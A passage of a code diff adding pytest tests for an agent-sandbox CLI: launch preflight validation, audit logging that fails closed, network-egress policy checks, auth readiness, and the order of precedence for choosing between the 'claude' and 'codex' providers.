+ ImageStatus, + LaunchReadiness, + ProviderResolutionSource, + _auth_readiness_to_status, + _infer_resolution_source, + allowed_provider_ids, + collect_launch_readiness, + ensure_launch_ready, + resolve_launch_provider, +) +from scc_cli.core.contracts import AgentLaunchSpec, AuditEvent +from scc_cli.core.contracts import AuthReadiness as AuthReadinessContract +from scc_cli.core.errors import ( + InvalidLaunchPlanError, + LaunchAuditUnavailableError, + LaunchAuditWriteError, + LaunchPolicyBlockedError, + ProviderNotReadyError, +) +from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.models import MountSpec, SandboxHandle, SandboxSpec +from tests.fakes.fake_agent_provider import FakeAgentProvider +from tests.fakes.fake_agent_runner import FakeAgentRunner +from tests.test_application_start_session import FakeGitClient + + +@dataclass +class RecordingAuditSink: + events: list[AuditEvent] = field(default_factory=list) + + def append(self, event: AuditEvent) -> None: + self.events.append(event) + + def describe_destination(self) -> str: + return "memory://audit" + + +class FailingAuditSink: + def append(self, event: AuditEvent) -> None: + raise OSError("disk full") + + def describe_destination(self) -> str: + return "/tmp/launch-events.jsonl" + + +class RecordingSandboxRuntime: + def __init__(self) -> None: + self.calls = 0 + + def ensure_available(self) -> None: + return None + + def run(self, spec: SandboxSpec) -> SandboxHandle: + self.calls += 1 + return SandboxHandle(sandbox_id=f"sandbox-{self.calls}", name="sandbox-name") + + def resume(self, handle: SandboxHandle) -> None: + return None + + def stop(self, handle: SandboxHandle) -> None: + return None + + def remove(self, handle: SandboxHandle) -> None: + return None + + def list_running(self) -> list[SandboxHandle]: + return [] + + def status(self, handle: SandboxHandle): # pragma: no cover - not used here + raise NotImplementedError + + +def _build_plan( + tmp_path: Path, + *, + network_policy: str | None = "open", + provider_id: str = "claude", + required_destination_sets: tuple[str, ...] = ("anthropic-core",), + include_agent_launch_spec: bool = True, +) -> StartSessionPlan: + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + resolver_result = ResolverResult( + workspace_root=workspace_path, + entry_dir=workspace_path, + mount_root=workspace_path, + container_workdir=str(workspace_path), + is_auto_detected=False, + is_suspicious=False, + reason="test", + ) + sandbox_spec = SandboxSpec( + image="test-image", + workspace_mount=MountSpec(source=workspace_path, target=workspace_path), + workdir=workspace_path, + network_policy=network_policy, + ) + agent_launch_spec = None + if include_agent_launch_spec: + agent_launch_spec = AgentLaunchSpec( + provider_id=provider_id, + argv=("claude",), + workdir=workspace_path, + required_destination_sets=required_destination_sets, + ) + return StartSessionPlan( + resolver_result=resolver_result, + workspace_path=workspace_path, + team=None, + session_name="session-1", + resume=False, + fresh=False, + current_branch=None, + effective_config=None, + sync_result=None, + sync_error_message=None, + agent_settings=None, + sandbox_spec=sandbox_spec, + agent_launch_spec=agent_launch_spec, + ) + + +def _build_dependencies( + *, + sandbox_runtime: RecordingSandboxRuntime | None = None, + audit_event_sink: RecordingAuditSink | FailingAuditSink | None = None, +) -> StartSessionDependencies: + return StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=FakeAgentRunner(), + sandbox_runtime=sandbox_runtime or RecordingSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + agent_provider=FakeAgentProvider(), + audit_event_sink=audit_event_sink, + ) + + +def test_evaluate_launch_preflight_rejects_missing_agent_launch_spec(tmp_path: Path) -> None: + plan = _build_plan(tmp_path, include_agent_launch_spec=False) + + with pytest.raises(InvalidLaunchPlanError, match="missing provider launch metadata"): + evaluate_launch_preflight(plan) + + +def test_evaluate_launch_preflight_rejects_blank_provider_identity(tmp_path: Path) -> None: + plan = _build_plan(tmp_path, provider_id=" ") + + with pytest.raises(InvalidLaunchPlanError, match="missing provider identity"): + evaluate_launch_preflight(plan) + + +def test_evaluate_launch_preflight_rejects_blank_required_destination_name(tmp_path: Path) -> None: + plan = _build_plan(tmp_path, required_destination_sets=("anthropic-core", " ")) + + with pytest.raises(InvalidLaunchPlanError, match="blank required destination set"): + evaluate_launch_preflight(plan) + + +def test_finalize_launch_emits_preflight_and_launch_started_events_for_allowed_launch( + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path, network_policy="open") + runtime = RecordingSandboxRuntime() + sink = RecordingAuditSink() + dependencies = _build_dependencies(sandbox_runtime=runtime, audit_event_sink=sink) + + handle = finalize_launch(plan, dependencies=dependencies) + + assert handle.sandbox_id == "sandbox-1" + assert runtime.calls == 1 + assert [event.event_type for event in sink.events] == [ + "launch.preflight.passed", + "launch.started", + ] + assert sink.events[0].metadata["provider_id"] == "claude" + assert sink.events[0].metadata["required_destination_sets"] == "anthropic-core" + assert sink.events[1].metadata["sandbox_id"] == "sandbox-1" + + +def test_finalize_launch_blocks_locked_down_provider_launch_before_runtime_start( + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path, network_policy="locked-down-web") + runtime = RecordingSandboxRuntime() + sink = RecordingAuditSink() + dependencies = _build_dependencies(sandbox_runtime=runtime, audit_event_sink=sink) + + with pytest.raises(LaunchPolicyBlockedError, match="locked-down-web"): + finalize_launch(plan, dependencies=dependencies) + + assert runtime.calls == 0 + assert [event.event_type for event in sink.events] == ["launch.preflight.failed"] + assert sink.events[0].metadata["failure_reason"].startswith("Launch blocked before startup") + + +def test_finalize_launch_allows_standalone_launch_without_required_destination_sets( + tmp_path: Path, +) -> None: + plan = _build_plan( + tmp_path, + network_policy=None, + provider_id="codex", + required_destination_sets=(), + ) + sink = RecordingAuditSink() + dependencies = _build_dependencies(audit_event_sink=sink) + + handle = finalize_launch(plan, dependencies=dependencies) + + assert handle.sandbox_id == "sandbox-1" + assert sink.events[0].metadata["network_policy"] == "open" + assert sink.events[0].metadata["required_destination_sets"] == "" + assert sink.events[0].subject == "codex" + + +def test_finalize_launch_fails_closed_when_audit_write_fails(tmp_path: Path) -> None: + plan = _build_plan(tmp_path, network_policy="open") + runtime = RecordingSandboxRuntime() + dependencies = _build_dependencies( + sandbox_runtime=runtime, + audit_event_sink=FailingAuditSink(), + ) + + with pytest.raises(LaunchAuditWriteError, match="launch-events.jsonl"): + finalize_launch(plan, dependencies=dependencies) + + assert runtime.calls == 0 + + +def test_finalize_launch_requires_audit_sink_once_preflight_seam_is_in_use(tmp_path: Path) -> None: + plan = _build_plan(tmp_path, network_policy="open") + dependencies = _build_dependencies(audit_event_sink=None) + + with pytest.raises(LaunchAuditUnavailableError): + finalize_launch(plan, dependencies=dependencies) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Enforced-mode destination resolution validation +# ═══════════════════════════════════════════════════════════════════════════════ + + +def test_evaluate_launch_preflight_blocks_unresolvable_enforced_destinations( + tmp_path: Path, +) -> None: + """Enforced mode with an unknown destination set name should raise.""" + plan = _build_plan( + tmp_path, + network_policy="web-egress-enforced", + required_destination_sets=("totally-unknown-set",), + ) + + with pytest.raises(LaunchPolicyBlockedError, match="resolution failed"): + evaluate_launch_preflight(plan) + + +def test_evaluate_launch_preflight_allows_resolvable_enforced_destinations( + tmp_path: Path, +) -> None: + """Enforced mode with known destination set names should pass preflight.""" + plan = _build_plan( + tmp_path, + network_policy="web-egress-enforced", + required_destination_sets=("anthropic-core",), + ) + + decision = evaluate_launch_preflight(plan) + assert decision.provider_id == "claude" + assert decision.network_policy == "web-egress-enforced" + assert decision.required_destination_sets == ("anthropic-core",) + + +def test_evaluate_launch_preflight_enforced_empty_destinations_passes( + tmp_path: Path, +) -> None: + """Enforced mode with no required destination sets should pass preflight.""" + plan = _build_plan( + tmp_path, + network_policy="web-egress-enforced", + required_destination_sets=(), + ) + + decision = evaluate_launch_preflight(plan) + assert decision.network_policy == "web-egress-enforced" + + +def test_evaluate_launch_preflight_enforced_mixed_known_unknown_blocks( + tmp_path: Path, +) -> None: + """Enforced mode with a mix of known and unknown sets should raise.""" + plan = _build_plan( + tmp_path, + network_policy="web-egress-enforced", + required_destination_sets=("anthropic-core", "nonexistent-set"), + ) + + with pytest.raises(LaunchPolicyBlockedError, match="resolution failed"): + evaluate_launch_preflight(plan) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Commands-layer preflight: typed readiness model and pure/side-effect split +# ═══════════════════════════════════════════════════════════════════════════════ + +# ───────────────────────────────────────────────────────────────────────────── +# Enum and model tests +# ───────────────────────────────────────────────────────────────────────────── + + +class TestImageStatus: + def test_values(self) -> None: + assert ImageStatus.AVAILABLE.value == "available" + assert ImageStatus.MISSING.value == "missing" + assert ImageStatus.UNKNOWN.value == "unknown" + + +class TestAuthStatus: + def test_values(self) -> None: + assert AuthStatus.PRESENT.value == "present" + assert AuthStatus.MISSING.value == "missing" + assert AuthStatus.EXPIRED.value == "expired" + assert AuthStatus.UNKNOWN.value == "unknown" + + +class TestProviderResolutionSource: + def test_values(self) -> None: + assert ProviderResolutionSource.EXPLICIT.value == "explicit" + assert ProviderResolutionSource.RESUME.value == "resume" + assert ProviderResolutionSource.WORKSPACE_LAST_USED.value == "workspace_last_used" + assert ProviderResolutionSource.GLOBAL_PREFERRED.value == "global_preferred" + assert ProviderResolutionSource.AUTO_SINGLE.value == "auto_single" + assert ProviderResolutionSource.PROMPTED.value == "prompted" + + +class TestLaunchReadiness: + def test_launch_ready_when_all_present(self) -> None: + r = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=False, + requires_auth_bootstrap=False, + launch_ready=True, + ) + assert r.launch_ready is True + assert r.requires_image_bootstrap is False + assert r.requires_auth_bootstrap is False + + def test_not_ready_when_image_missing(self) -> None: + r = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.MISSING, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=True, + requires_auth_bootstrap=False, + launch_ready=False, + ) + assert r.launch_ready is False + assert r.requires_image_bootstrap is True + + def test_not_ready_when_auth_missing(self) -> None: + r = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.RESUME, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + assert r.launch_ready is False + assert r.requires_auth_bootstrap is True + + def test_frozen(self) -> None: + r = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=False, + requires_auth_bootstrap=False, + launch_ready=True, + ) + with pytest.raises(AttributeError): + r.provider_id = "codex" # type: ignore[misc] + + +# ───────────────────────────────────────────────────────────────────────────── +# allowed_provider_ids +# ───────────────────────────────────────────────────────────────────────────── + + +class TestAllowedProviderIds: + def test_returns_empty_without_org(self) -> None: + assert allowed_provider_ids(None, None) == () + + def test_returns_empty_without_team(self) -> None: + org = MagicMock() + assert allowed_provider_ids(org, None) == () + + def test_returns_empty_with_empty_team(self) -> None: + org = MagicMock() + assert allowed_provider_ids(org, "") == () + + def test_returns_empty_when_profile_not_found(self) -> None: + org = MagicMock() + org.get_profile.return_value = None + assert allowed_provider_ids(org, "my-team") == () + + def test_returns_team_allowed_providers(self) -> None: + org = MagicMock() + profile = MagicMock() + profile.allowed_providers = ("claude", "codex") + org.get_profile.return_value = profile + assert allowed_provider_ids(org, "my-team") == ("claude", "codex") + + +# ───────────────────────────────────────────────────────────────────────────── +# _auth_readiness_to_status +# ───────────────────────────────────────────────────────────────────────────── + + +class TestAuthReadinessToStatus: + def test_none_returns_unknown(self) -> None: + assert _auth_readiness_to_status(None) == AuthStatus.UNKNOWN + + def test_present(self) -> None: + ar = AuthReadinessContract(status="present", mechanism="oauth_file", guidance="") + assert _auth_readiness_to_status(ar) == AuthStatus.PRESENT + + def test_missing(self) -> None: + ar = AuthReadinessContract(status="missing", mechanism="oauth_file", guidance="sign in") + assert _auth_readiness_to_status(ar) == AuthStatus.MISSING + + def test_expired(self) -> None: + ar = AuthReadinessContract(status="expired", mechanism="oauth_file", guidance="re-auth") + assert _auth_readiness_to_status(ar) == AuthStatus.EXPIRED + + def test_unexpected_string(self) -> None: + ar = AuthReadinessContract(status="weird", mechanism="oauth_file", guidance="") + assert _auth_readiness_to_status(ar) == AuthStatus.UNKNOWN + + +# ───────────────────────────────────────────────────────────────────────────── +# _infer_resolution_source +# ───────────────────────────────────────────────────────────────────────────── + + +class TestInferResolutionSource: + def test_none_provider_returns_explicit(self) -> None: + result = _infer_resolution_source( + provider_id=None, + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected=(), + allowed=(), + ) + assert result == ProviderResolutionSource.EXPLICIT + + def test_cli_flag_match(self) -> None: + result = _infer_resolution_source( + provider_id="claude", + cli_flag="claude", + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected=(), + allowed=(), + ) + assert result == ProviderResolutionSource.EXPLICIT + + def test_resume_match(self) -> None: + result = _infer_resolution_source( + provider_id="codex", + cli_flag=None, + resume_provider="codex", + workspace_last_used=None, + config_provider=None, + connected=(), + allowed=(), + ) + assert result == ProviderResolutionSource.RESUME + + def test_workspace_last_used_match(self) -> None: + result = _infer_resolution_source( + provider_id="claude", + cli_flag=None, + resume_provider=None, + workspace_last_used="claude", + config_provider=None, + connected=(), + allowed=(), + ) + assert result == ProviderResolutionSource.WORKSPACE_LAST_USED + + def test_global_preferred_match(self) -> None: + result = _infer_resolution_source( + provider_id="codex", + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider="codex", + connected=(), + allowed=(), + ) + assert result == ProviderResolutionSource.GLOBAL_PREFERRED + + def test_auto_single_connected(self) -> None: + result = _infer_resolution_source( + provider_id="claude", + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected=("claude",), + allowed=(), + ) + assert result == ProviderResolutionSource.AUTO_SINGLE + + def test_auto_single_one_allowed(self) -> None: + result = _infer_resolution_source( + provider_id="codex", + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected=(), + allowed=("codex",), + ) + assert result == ProviderResolutionSource.AUTO_SINGLE + + def test_precedence_cli_over_resume(self) -> None: + """cli_flag takes precedence over resume_provider.""" + result = _infer_resolution_source( + provider_id="claude", + cli_flag="claude", + resume_provider="claude", + workspace_last_used=None, + config_provider=None, + connected=(), + allowed=(), + ) + assert result == ProviderResolutionSource.EXPLICIT + + +# ───────────────────────────────────────────────────────────────────────────── +# collect_launch_readiness +# ───────────────────────────────────────────────────────────────────────────── + + +class TestCollectLaunchReadiness: + @patch("scc_cli.commands.launch.preflight._check_image_available") + def test_ready_when_both_present(self, mock_image: MagicMock) -> None: + mock_image.return_value = ImageStatus.AVAILABLE + + adapters = MagicMock() + provider = MagicMock() + provider.auth_check.return_value = AuthReadinessContract( + status="present", mechanism="oauth_file", guidance="" + ) + adapters.agent_provider = provider + + readiness = collect_launch_readiness("claude", ProviderResolutionSource.EXPLICIT, adapters) + assert readiness.launch_ready is True + assert readiness.image_status == ImageStatus.AVAILABLE + assert readiness.auth_status == AuthStatus.PRESENT + + @patch("scc_cli.commands.launch.preflight._check_image_available") + def test_not_ready_when_image_missing(self, mock_image: MagicMock) -> None: + mock_image.return_value = ImageStatus.MISSING + + adapters = MagicMock() + provider = MagicMock() + provider.auth_check.return_value = AuthReadinessContract( + status="present", mechanism="oauth_file", guidance="" + ) + adapters.agent_provider = provider + + readiness = collect_launch_readiness("claude", ProviderResolutionSource.EXPLICIT, adapters) + assert readiness.launch_ready is False + assert readiness.requires_image_bootstrap is True + assert readiness.requires_auth_bootstrap is False + + @patch("scc_cli.commands.launch.preflight._check_image_available") + def test_not_ready_when_auth_missing(self, mock_image: MagicMock) -> None: + mock_image.return_value = ImageStatus.AVAILABLE + + adapters = MagicMock() + provider = MagicMock() + provider.auth_check.return_value = AuthReadinessContract( + status="missing", mechanism="oauth_file", guidance="sign in" + ) + adapters.agent_provider = provider + + readiness = collect_launch_readiness("claude", ProviderResolutionSource.EXPLICIT, adapters) + assert readiness.launch_ready is False + assert readiness.requires_auth_bootstrap is True + + @patch("scc_cli.commands.launch.preflight._check_image_available") + def test_auth_expired_requires_bootstrap(self, mock_image: MagicMock) -> None: + mock_image.return_value = ImageStatus.AVAILABLE + + adapters = MagicMock() + provider = MagicMock() + provider.auth_check.return_value = AuthReadinessContract( + status="expired", mechanism="oauth_file", guidance="re-auth" + ) + adapters.agent_provider = provider + + readiness = collect_launch_readiness("claude", ProviderResolutionSource.EXPLICIT, adapters) + assert readiness.requires_auth_bootstrap is True + assert readiness.auth_status == AuthStatus.EXPIRED + + +# ───────────────────────────────────────────────────────────────────────────── +# ensure_launch_ready +# ───────────────────────────────────────────────────────────────────────────── + + +class TestEnsureLaunchReady: + def test_noop_when_ready(self) -> None: + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=False, + requires_auth_bootstrap=False, + launch_ready=True, + ) + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=False, + show_notice=MagicMock(), + ) + + @patch("scc_cli.commands.launch.provider_image.ensure_provider_image") + def test_calls_ensure_image_when_missing(self, mock_ensure: MagicMock) -> None: + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.MISSING, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=True, + requires_auth_bootstrap=False, + launch_ready=False, + ) + console = MagicMock() + notice = MagicMock() + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=console, + non_interactive=False, + show_notice=notice, + ) + mock_ensure.assert_called_once_with( + "claude", console=console, non_interactive=False, show_notice=notice + ) + + def test_non_interactive_auth_missing_raises(self) -> None: + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + with pytest.raises(ProviderNotReadyError, match="auth cache is missing"): + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=True, + show_notice=MagicMock(), + ) + + def test_non_interactive_auth_expired_raises(self) -> None: + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.EXPIRED, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + with pytest.raises(ProviderNotReadyError, match="auth cache is expired"): + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=True, + show_notice=MagicMock(), + ) + + @patch("scc_cli.commands.launch.dependencies.get_agent_provider") + def test_interactive_auth_missing_calls_show_notice_and_bootstrap( + self, mock_get_provider: MagicMock + ) -> None: + mock_provider = MagicMock() + mock_get_provider.return_value = mock_provider + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + notice = MagicMock() + adapters = MagicMock() + ensure_launch_ready( + readiness, + adapters=adapters, + console=MagicMock(), + non_interactive=False, + show_notice=notice, + ) + notice.assert_called_once() + call_args = notice.call_args[0] + assert "Authenticating" in call_args[0] + mock_get_provider.assert_called_once_with(adapters, "claude") + mock_provider.bootstrap_auth.assert_called_once() + + @patch("scc_cli.commands.launch.dependencies.get_agent_provider") + @patch("scc_cli.commands.launch.provider_image.ensure_provider_image") + def test_both_missing_fixes_image_then_auth( + self, mock_ensure_image: MagicMock, mock_get_provider: MagicMock + ) -> None: + mock_provider = MagicMock() + mock_get_provider.return_value = mock_provider + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.MISSING, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=True, + requires_auth_bootstrap=True, + launch_ready=False, + ) + notice = MagicMock() + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=False, + show_notice=notice, + ) + # Image should be ensured + mock_ensure_image.assert_called_once() + # Auth notice should fire and bootstrap_auth should be called + assert notice.call_count >= 1 + mock_provider.bootstrap_auth.assert_called_once() + + @patch("scc_cli.commands.launch.dependencies.get_agent_provider") + def test_bootstrap_auth_failure_wraps_as_provider_not_ready( + self, mock_get_provider: MagicMock + ) -> None: + """bootstrap_auth() failure gets wrapped in ProviderNotReadyError.""" + mock_provider = MagicMock() + mock_provider.bootstrap_auth.side_effect = RuntimeError("browser failed") + mock_get_provider.return_value = mock_provider + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + with pytest.raises(ProviderNotReadyError, match="auth bootstrap failed"): + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=False, + show_notice=MagicMock(), + ) + + @patch("scc_cli.commands.launch.dependencies.get_agent_provider") + def test_bootstrap_auth_provider_not_ready_passes_through( + self, mock_get_provider: MagicMock + ) -> None: + """ProviderNotReadyError from bootstrap_auth() passes through unwrapped.""" + original_err = ProviderNotReadyError( + provider_id="claude", + user_message="Auth denied", + suggested_action="Try again", + ) + mock_provider = MagicMock() + mock_provider.bootstrap_auth.side_effect = original_err + mock_get_provider.return_value = mock_provider + readiness = LaunchReadiness( + provider_id="claude", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=False, + show_notice=MagicMock(), + ) + assert exc_info.value is original_err + + +# ───────────────────────────────────────────────────────────────────────────── +# resolve_launch_provider +# ───────────────────────────────────────────────────────────────────────────── + + +class TestResolveLaunchProvider: + def test_explicit_flag(self) -> None: + adapters = MagicMock() + provider_id, source = resolve_launch_provider( + cli_flag="claude", + resume_provider=None, + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + assert provider_id == "claude" + assert source == ProviderResolutionSource.EXPLICIT + + def test_resume_provider(self) -> None: + adapters = MagicMock() + provider_id, source = resolve_launch_provider( + cli_flag=None, + resume_provider="codex", + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + assert provider_id == "codex" + assert source == ProviderResolutionSource.RESUME + + def test_non_interactive_multiple_providers_raises(self) -> None: + adapters = MagicMock() + # No flags, no connected → multiple providers, non-interactive + with pytest.raises(ProviderNotReadyError, match="Multiple providers"): + resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + + def test_global_preferred(self) -> None: + adapters = MagicMock() + provider_id, source = resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=None, + config_provider="codex", + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + assert provider_id == "codex" + assert source == ProviderResolutionSource.GLOBAL_PREFERRED diff --git a/tests/test_launch_preflight_characterization.py b/tests/test_launch_preflight_characterization.py new file mode 100644 index 0000000..636c2c2 --- /dev/null +++ b/tests/test_launch_preflight_characterization.py @@ -0,0 +1,774 @@ +"""Characterization tests for launch preflight provider resolution across all five call sites. + +These tests document the *current* behavior of each launch path's provider resolution +as a regression baseline. They capture the differences between sites so that the +upcoming consolidation can verify it produces identical behavior. + +Sites: + 1. flow.py start() — full precedence via choose_start_provider() + 2. flow_interactive.py — choose_start_provider(cli_flag=None, resume_provider=None) + 3. worktree_commands.py — resolve_active_provider() directly (simpler, no workspace/probe) + 4. orchestrator_handlers.py — _handle_worktree_start(): choose_start_provider(cli_flag=None, resume_provider=None) + 5. orchestrator_handlers.py — _handle_session_resume(): choose_start_provider(resume_provider=session.provider_id) + 6. _record_session_and_context — WorkContext.provider_id always None (not forwarded) +""" + +from __future__ import annotations + +from pathlib import Path +from typing import Any +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.application.provider_selection import resolve_provider_preference +from scc_cli.commands.launch.provider_choice import choose_start_provider +from scc_cli.contexts import WorkContext +from scc_cli.core.provider_resolution import resolve_active_provider + +# ───────────────────────────────────────────────────────────────────────────── +# Helpers +# ───────────────────────────────────────────────────────────────────────────── + + +def _noop_prompt( + allowed: tuple[str, ...], + connected: tuple[str, ...], + default: str | None, +) -> str | None: + """Simulates an interactive prompt that returns the first allowed provider.""" + return allowed[0] if allowed else None + + +def _cancel_prompt( + allowed: tuple[str, ...], + connected: tuple[str, ...], + default: str | None, +) -> str | None: + """Simulates user cancelling the prompt.""" + return None + + +def _make_fake_adapters( + *, + claude_auth_status: str = "present", + codex_auth_status: str = "absent", +) -> Any: + """Build a minimal mock adapters object for provider_choice functions.""" + adapters = MagicMock() + claude_readiness = MagicMock() + claude_readiness.status = claude_auth_status + codex_readiness = MagicMock() + codex_readiness.status = codex_auth_status + adapters.agent_provider.auth_check.return_value = claude_readiness + adapters.codex_agent_provider.auth_check.return_value = codex_readiness + return adapters + + +# ───────────────────────────────────────────────────────────────────────────── +# Site 1: flow.py start() — _resolve_provider uses choose_start_provider +# with full precedence chain +# ───────────────────────────────────────────────────────────────────────────── + + +class TestFlowStartProviderResolution: + """Characterize flow.py start()'s provider resolution via _resolve_provider. + + _resolve_provider calls choose_start_provider with all six inputs: + cli_flag, resume_provider, workspace_last_used, config_provider, + connected_provider_ids (from auth probing), and allowed_providers. + """ + + def test_cli_flag_wins_over_everything(self) -> None: + """CLI --provider flag is highest precedence.""" + result = choose_start_provider( + cli_flag="codex", + resume_provider="claude", + workspace_last_used="claude", + config_provider="claude", + connected_provider_ids=("claude",), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + def test_resume_provider_wins_over_workspace_and_config(self) -> None: + """Resume provider takes second precedence after cli_flag.""" + result = choose_start_provider( + cli_flag=None, + resume_provider="codex", + workspace_last_used="claude", + config_provider="claude", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + def test_workspace_last_used_wins_over_config(self) -> None: + """Workspace last-used provider beats global config.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="claude", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + def test_config_provider_used_when_no_higher_precedence(self) -> None: + """Global config provider used as last automatic source.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider="codex", + connected_provider_ids=("codex",), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + def test_config_provider_ask_suppresses_auto_selection(self) -> None: + """config_provider='ask' suppresses auto-selection, falls to connected.""" + # With one connected provider, it auto-selects + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider="ask", + connected_provider_ids=("claude",), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "claude" + + def test_single_connected_provider_auto_selected(self) -> None: + """When only one provider is connected, it is auto-selected.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("codex",), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + def test_non_interactive_raises_when_ambiguous(self) -> None: + """Non-interactive mode raises ProviderNotReadyError when ambiguous.""" + from scc_cli.core.errors import ProviderNotReadyError + + with pytest.raises(ProviderNotReadyError): + choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + + def test_interactive_falls_to_prompt(self) -> None: + """Interactive mode prompts user when auto-selection is ambiguous.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + # _noop_prompt returns first allowed; KNOWN_PROVIDERS is ('claude', 'codex') + assert result == "claude" + + def test_allowed_providers_restricts_resolution(self) -> None: + """Team policy allowed_providers filters the candidate set.""" + from scc_cli.core.errors import ProviderNotAllowedError + + with pytest.raises(ProviderNotAllowedError): + choose_start_provider( + cli_flag="claude", + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=(), + allowed_providers=("codex",), + non_interactive=True, + prompt_choice=None, + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# Site 2: flow_interactive.py run_start_wizard_flow() — cli_flag=None, +# resume_provider=None, always interactive +# ───────────────────────────────────────────────────────────────────────────── + + +class TestFlowInteractiveProviderResolution: + """Characterize flow_interactive.py's inline provider resolution. + + Key differences from flow.py start(): + - cli_flag is always None (no CLI flag in wizard flow) + - resume_provider is always None (no session resume in wizard) + - non_interactive is always False (wizard is always interactive) + """ + + def test_no_cli_flag_available(self) -> None: + """Wizard flow never has a CLI flag — relies on workspace/config/probe.""" + result = choose_start_provider( + cli_flag=None, # <-- always None in wizard flow + resume_provider=None, # <-- always None in wizard flow + workspace_last_used="codex", + 